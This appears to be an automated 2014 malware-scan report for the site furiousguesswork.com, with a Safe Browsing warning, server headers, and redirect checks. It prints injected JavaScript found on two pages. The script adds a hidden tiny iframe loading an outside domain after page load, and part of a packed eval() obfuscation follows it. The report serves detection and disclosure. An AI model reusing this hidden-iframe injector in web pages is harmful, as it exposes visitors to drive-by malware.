Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=furiousguesswork.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.furiousguesswork.com/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 20:54:31 GMT Location: http://furiousguesswork.com/ Server: lighttpd/1.4.13 Content-Type: text/html; charset=UTF-8 Status: 302 X-Pingback: http://furiousguesswork.com/xmlrpc.php X-Powered-By: PHP/5.2.1 | clean |
http://furiousguesswork.com/ | 200 OK Content-Length: 58094 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://furiousguesswork.com/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57276 Content-Type: text/javascript | clean |
http://furiousguesswork.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=5.3 | 200 OK Content-Length: 919 Content-Type: text/javascript | clean |
http://s7.addthis.com/js/250/addthis_widget.js?pub=mpark | 200 OK Content-Length: 10550 Content-Type: text/javascript | clean |
http://www.furiousguesswork.com/index.php/about/ | HTTP/1.1 302 Found Connection: close Date: Mon, 29 Dec 2014 20:54:36 GMT Location: http://furiousguesswork.com/index.php/about/ Server: lighttpd/1.4.13 Content-Type: text/html; charset=UTF-8 Status: 302 X-Pingback: http://furiousguesswork.com/xmlrpc.php X-Powered-By: PHP/5.2.1 | clean |
http://furiousguesswork.com/index.php/about/ | 200 OK Content-Length: 42530 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Decoded script: eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3e(33(p,a,c,k,e,d){e=33(c){32(c<a?\'\':e(3g(c/a)))+((c=c%a)>35?38.3c(c+29):c.3f(36))};34(!\'\'.37(/^/,38)){39(c--){d[e(c)]=k[c]||e(c)}k=[33(e){32 d[e]}];e=33(){32\'\\\\w+\'};c=1};39(c--){34(k[c]){p=p.37(3a 3b(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c])}}32 p}(\'1N(1o(p,a,c,k,e, Antivirus reports:
| ||
http://furiousguesswork.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: furiousguesswork.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Dec 2014 20:54:32 GMT
Server: lighttpd/1.4.13
Content-Type: text/html; charset=UTF-8
X-Pingback: http://furiousguesswork.com/xmlrpc.php
X-Powered-By: PHP/5.2.1
GET / HTTP/1.1
Host: furiousguesswork.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 29 Dec 2014 20:54:32 GMT
Server: lighttpd/1.4.13
Content-Type: text/html; charset=UTF-8
X-Pingback: http://furiousguesswork.com/xmlrpc.php
X-Powered-By: PHP/5.2.1
Second query (visit from search engine):
GET / HTTP/1.1
Host: furiousguesswork.com
Referer: http://www.google.com/search?q=furiousguesswork.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: furiousguesswork.com
Referer: http://www.google.com/search?q=furiousguesswork.com
Result:
The result is similar to the first query. There are no suspicious redirects found.